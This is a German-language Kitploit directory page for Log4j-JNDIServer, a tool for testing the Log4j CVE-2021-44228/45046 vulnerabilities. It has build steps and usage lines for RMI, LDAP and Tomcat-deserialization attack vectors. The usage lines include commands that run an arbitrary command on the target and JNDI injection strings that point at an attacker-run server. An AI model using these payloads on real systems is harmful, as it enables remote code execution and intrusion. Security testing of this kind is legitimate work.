Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4j-JNDIServer — Dieses Projekt hilft, die Log4j CVE-2021-44228-Sicherheitslücke zu testen. | Kitploit
Tools/GitHubGitHub/immunityinc/log4j-jndiserver
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlRemote-Access-Tool
GitHubimmunityinc/log4j-jndiserver

Log4j-JNDIServer

Dieses Projekt hilft, die Log4j CVE-2021-44228-Sicherheitslücke zu testen.

Repository anzeigen
92vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Log4j-JNDIServer

Dieses Projekt hilft, die Log4j-Schwachstellen CVE-2021-44228/CVE-2021-45046 zu testen.

Installation und Erstellung

  • Laden Sie das Projekt in Intellij Idea
  • Wählen Sie JDK in "Projects Settings" (CTRL + ALT + SHIFT + S)
  • In "Project Settings", erstellen Sie das Artifact -> "Artifacts" -> "Create JAR from Modules" -> In "JAR files from libraries", markieren Sie "extract to target JAR" -> "OK"
  • Projekt erstellen (CTRL + F9). Dadurch wird die JAR-Datei im Ordner /out/artifacts/ erstellt.

Erstellung mit Maven

Erfordert Java 1.8+ und Maven 3.x+

  • mvn clean package -DskipTests
  • Sie finden die .jar-Datei im Ordner /target

Verwendung

1.RMI-Angriffsvektor

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

Sie müssen die Exploit.class nicht mehr hosten. Die App startet einen HTTP-Server auf dem angegebenen Port.

Sie müssen den Befehl angeben, den Sie auf dem Ziel ausführen möchten.

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2.LDAP-Angriffsvektor

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

Sie müssen die Exploit.class nicht mehr hosten. Die App startet einen HTTP-Server auf dem angegebenen Port.

Sie müssen den Befehl angeben, den Sie auf dem Ziel ausführen möchten.

Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3.Deserialisierungs-Angriffsvektor (unter Verwendung von Tomcat-Payload)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

Beispiel

root@kitploit:~
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat  -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -
Tool herunterladen